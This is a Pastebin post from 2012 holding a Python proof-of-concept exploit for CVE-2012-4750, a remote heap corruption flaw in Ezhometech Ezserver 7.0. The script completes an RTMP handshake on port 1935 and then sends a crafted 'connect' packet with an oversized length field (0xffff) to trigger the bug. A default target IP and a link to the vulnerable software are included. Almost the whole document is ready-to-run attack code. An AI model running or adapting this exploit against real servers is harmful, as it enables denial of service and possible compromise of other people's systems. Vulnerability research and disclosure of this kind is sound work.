Advertisement
Guest User

Ezhometech Ezserver 7.0 Remote Heap Corruption Vulnerabilit

a guest
Oct 13th, 2012
534
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.28 KB | None | 0 0
  1. #Ezhometech Ezserver 7.0 Remote Heap Corruption Vulnerability POC code
  2. #Author: Lorenzo Cantoni
  3. #CVE: CVE-2012-4750
  4. #Link to vulnerable software: http://www.4shared.com/zip/eVs9I2Gf/ezserver70001_win.html
  5.  
  6. from socket import *
  7. import sys
  8. import os
  9. import time
  10.  
  11. version = "\x03"
  12. zero_pad="\x00" * 4
  13.  
  14. c1_finger= "\x05\xaf\x52\x83\x0b\xd2\x11\xa5\x48\x88\x94\xcc\x0b\x05\x22\x55\x04\x87\x11\xcd\x19\x85\x10\xa9\xe9\x43\xbf\x8b\x83\x91\x98\x45\x5f\xbd\x41\x07\x30\x05\xd3\x03\x99\x0b\x88\xd9\xb6\x36\x56\xd4\x3c\xfe\xc8\xed\x83\x74\x8f\x4b\x0f\x0f\xc5\x12\x02\x16\x79\x4b\x22\xa0\x54\xe5\xbc\x58\xab\xd8\xc4\x10\x96\x07\x08\x84\x39\x34\x53\xce\x50\x96\x94\xaf\xbe\xab\xe0"
  15.  
  16. c1 = os.urandom(1537 - len(version+ zero_pad+c1_finger))
  17.  
  18. c0c1 = version + zero_pad + c1 + c1_finger
  19.  
  20.  
  21. if len(sys.argv) >=2:
  22. server = sys.argv[1]
  23. else:
  24. server ="192.168.1.65"
  25.  
  26.  
  27. s = socket(AF_INET, SOCK_STREAM)
  28.  
  29. s.connect((server,1935))
  30.  
  31. # Handshake C0+C1 (sent by client)
  32.  
  33. s.send(c0c1)
  34. time.sleep(2)
  35.  
  36. # Handshake S0+S1+S2 (sent by server)
  37. s0s1s2= s.recv(1700)
  38. time.sleep(2)
  39. # Handshake C2
  40. #parse the payload which has to be echoed back to the server
  41. echo = s0s1s2[1:1537]
  42.  
  43. c2 = echo
  44. s.send(c2)
  45. time.sleep(2)
  46.  
  47. # connect('live')
  48. size = '\x00\x00\x79'
  49. header = '\x03\x00\x00\x00' + size +'\x14\x00\x00\x00\x00'
  50. size_2 = '\xff\xff' # TRIGGERS THE VULNERABILITY - legit size: \x00\x07
  51. body_0 = '\x02' + size_2
  52. req = '\x63\x6f\x6e\x6e\x65\x63\x74' # connect
  53. body_1 = '\x00\x3f\xf0\x00\x00\x00\x00\x00\x00\x03\x00\x03\x61\x70\x70\x02\x00\x04'
  54. param = '\x6c\x69\x76\x65' #live
  55. body_2 = '\x00\x08\x66\x6c\x61\x73\x68\x56\x65\x72\x02\x00\x0d\x4c\x4e\x58\x20\x39\x2c\x30\x2c\x31\x32\x34\x2c\x32\x00\x05\x74\x63\x55\x72\x6c\x02\x00\x1d'
  56. url = 'rtmp://' + str(sys.argv[1]) + ':1935/live'
  57. body_3 = '\x00\x04\x66\x70\x61\x64\x01\x00\x00\x0c\x63\x61\x70\x61\x62\x69\x6c\x69\x74\x69\x65\x73\x00\x40\x2e\x00\x00\x00\x00\x00\x00\xc3\x00\x0b\x61\x75\x64\x69\x6f\x43\x6f\x64\x65\x63\x73\x00\x40\x99\x9c\x00\x00\x00\x00\x00\x00\x0b\x76\x69\x64\x65\x6f\x43\x6f\x64\x65\x63\x73\x00\x40\x6f\x80\x00\x00\x00\x00\x00\x00\x0d\x76\x69\x64\x65\x6f\x46\x75\x6e\x63\x74\x69\x6f\x6e\x00\x3f\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x09'
  58.  
  59. conn_live = header+ body_0 + req + body_1 + param + body_2 + url + body_3
  60.  
  61. s.send(conn_live)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement